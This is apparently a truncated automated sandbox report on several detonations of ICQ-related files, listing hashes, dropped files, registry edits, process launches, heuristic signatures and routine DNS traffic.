| SHA512 | f5882a3cded0a4e498519de5679ea12a0ea275c220e318af1762855a94bdac8dc5413d1c5d1a55a7cc31cfebcf4647dcf1f653195536ce1826a3002cf01aa12c |
C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
| MD5 | b8c50d741d429e4cd6210293c0f0d881 |
| SHA1 | 059f1aa663f344b66b7ab96bd092bfd08ef6b091 |
| SHA256 | 862a2046656a5a5dc1638c6b9ac7c751b90fceae08d37b4e2702b73c45278a8b |
| SHA512 | b7e6e142048371568ecdc9bc10c0da83c73125bdff1964839244f0b95eb7fd08a34f42f4fcd26ff5fac52f4350fb28c2505df2ce69c51a2fd0ff76a903d83096 |
C:\Users\Admin\AppData\Local\Info Tool Extension\is-GR4EN.tmp
| MD5 | ac7170bae67978f50a6497b1dd009f21 |
| SHA1 | 42ae21e9372aca1ae6c8161097d6880fa118a672 |
| SHA256 | d69fcb706ef1114d0e92fa440d9b99f87e252a81332fb62f8f08093d2ae3f7c2 |
| SHA512 | 8a9b663177e106e5629a046ca1e95b02b1641141550aab91b9aeb69e5e388d1ed2760a69683113a7902611861e44402d79400b94df96afdd6279fe7dc6fe241d |
C:\Users\Admin\AppData\Local\Info Tool Extension\is-GMUCN.tmp
| MD5 | b93db6647607a0d843f16a18288cbc26 |
| SHA1 | 7084e134cde85ad64e8934edb4c32455f0bdd216 |
| SHA256 | 7efbdfd9427800fda66e2945c71102489d7db8bbb3a6aad752ba2ef87e4a4849 |
| SHA512 | ca2fe98ee654ab0b71cdba00d202e0f3040509e9c9c529f72bad9b85ec26f74ae81d5beac20fe23db0b921f69e486189d1ebc16133a9e4e2b2555a9ea5287130 |
C:\Users\Admin\AppData\Local\Temp\FourthX.exe
| MD5 | 02df76a7b45d874395b4274c2e5b7b1f |
| SHA1 | 1b8d7060e9fa5204fa74efeb4192a168b778e9ca |
| SHA256 | 2f84a4b95126d6047929174a1d44106d9d4f62ba23c77e10218f79eca126d7a9 |
| SHA512 | 5675e3895878a8b558aa4a31e06ea9858ece0dde7eca67d7e80033a96571786790ddaa0a53859f84222eb87e6eaa451245e41b31b8b66ab946a50072d6ab249e |
C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdescs.new
| MD5 | ddc70c1cbe187733c81ce956eeaeae84 |
| SHA1 | a674e60241723c26a1366569f1568202142ffd2b |
| SHA256 | 34aef4846f688a42b7e30b033437f6c064fbdf87c3acf696a22f20f7fdd09284 |
| SHA512 | eead3e2b38a8e13e6e7208e5050bc2a226254deb1a5c76bcfd3db9699cb4ca88ab7afbda9ce23143c7856ce3f43479291afee4d6ca2539f32be4f420a2b5635a |
Analysis: behavioral17
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:58
Platform
win7-20240221-en
Max time kernel
118s
Max time network
129s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Resource\TypeSupport\Unicode\Mappings\win\CP1254.txt
Network
Files
Analysis: behavioral20
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:57
Platform
win10v2004-20240221-en
Max time kernel
147s
Max time network
153s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Resource\TypeSupport\Unicode\Mappings\win\CP1257.txt
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.15.104.51.in-addr.arpa | udp |
Files
Analysis: behavioral22
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:57
Platform
win10v2004-20240221-en
Max time kernel
149s
Max time network
154s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Resource\TypeSupport\Unicode\Mappings\win\CP1258.txt
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:58
Platform
win7-20240221-en
Max time kernel
119s
Max time network
129s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3000 -s 228
Network
Files
Analysis: behavioral15
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:58
Platform
win7-20240221-en
Max time kernel
122s
Max time network
143s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Resource\TypeSupport\Unicode\Mappings\win\CP1253.txt
Network
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:58
Platform
win7-20240221-en
Max time kernel
125s
Max time network
135s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Resource\TypeSupport\Unicode\Mappings\win\CP1252.txt
Network
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:58
Platform
win7-20240221-en
Max time kernel
118s
Max time network
140s
Command Line
Signatures
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS\ = "0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib\ = "{346F8AC1-CEB1-4E3E-944B-87D9840505C3}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "MIBLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods\ = "3" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ = "IMCLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ThreadingModel = "Both" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer\ = "ICQLiteShell.MCLiteShellExt.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID\ = "ICQLiteShell.MCLiteShellExt.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\ = "ICQLiteShell 1.0 Type Library" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods\ = "7" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "PSFactoryBuffer" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID\ = "ICQLiteShell.MCLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2704 wrote to memory of 3032 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2704 wrote to memory of 3032 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2704 wrote to memory of 3032 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2704 wrote to memory of 3032 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2704 wrote to memory of 3032 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2704 wrote to memory of 3032 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2704 wrote to memory of 3032 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll
Network
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:57
Platform
win10v2004-20240221-en
Max time kernel
150s
Max time network
154s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.73.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral18
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:58
Platform
win10v2004-20240221-en
Max time kernel
146s
Max time network
158s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Resource\TypeSupport\Unicode\Mappings\win\CP1254.txt
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 6.181.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral26
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:57
Platform
win10v2004-20240221-en
Max time kernel
90s
Max time network
152s
Command Line
Signatures
Enumerates physical storage devices
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\bentonite.png
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:58
Platform
win10v2004-20240221-en
Max time kernel
140s
Max time network
157s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Resource\TypeSupport\Unicode\Mappings\win\CP1251.txt
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.78.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.179.89.13.in-addr.arpa | udp |
Files
Analysis: behavioral19
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:57
Platform
win7-20240221-en
Max time kernel
119s
Max time network
123s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Resource\TypeSupport\Unicode\Mappings\win\CP1257.txt
Network
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:57
Platform
win7-20240220-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2856 wrote to memory of 2660 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
| PID 2856 wrote to memory of 2660 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
| PID 2856 wrote to memory of 2660 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\release_v4.rar
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\release_v4.rar"
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:57
Platform
win10v2004-20240221-en
Max time kernel
149s
Max time network
149s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
